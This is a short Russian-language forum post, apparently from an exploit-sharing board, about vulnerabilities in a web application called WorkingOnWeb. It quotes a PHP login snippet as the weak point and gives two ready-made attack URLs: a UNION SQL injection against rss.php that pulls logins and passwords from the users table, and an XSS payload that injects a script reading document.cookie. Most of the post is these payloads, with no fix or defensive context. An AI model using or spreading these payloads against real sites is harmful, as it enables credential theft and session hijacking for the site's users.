20.12.2008, 22:30
|
|
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122
Репутация:
2438
|
|
WorkingOnWeb
File: admin.inc.php
Уязвимый кусок кода:
Код:
$user = "";
$pass = "";
if (isset($_POST['loginname']) && $_POST['loginname'] != "")
$user = $_POST['loginname'];
if (isset($_POST['loginpass']) && $_POST['loginpass'] != "")
$pass = $_POST['loginpass'];
$loggedin = $this->loginuser($user, $pass);
SQL Иньекция:
Код:
http://path/articles/rss.php?category=-1/**/union/**/select/**/1,2,login,password/**/from/**/users/*
XSS иньекция:
Код:
http://path/wow/index.php/"><script>alert(document.cookie)</script>
|
|
|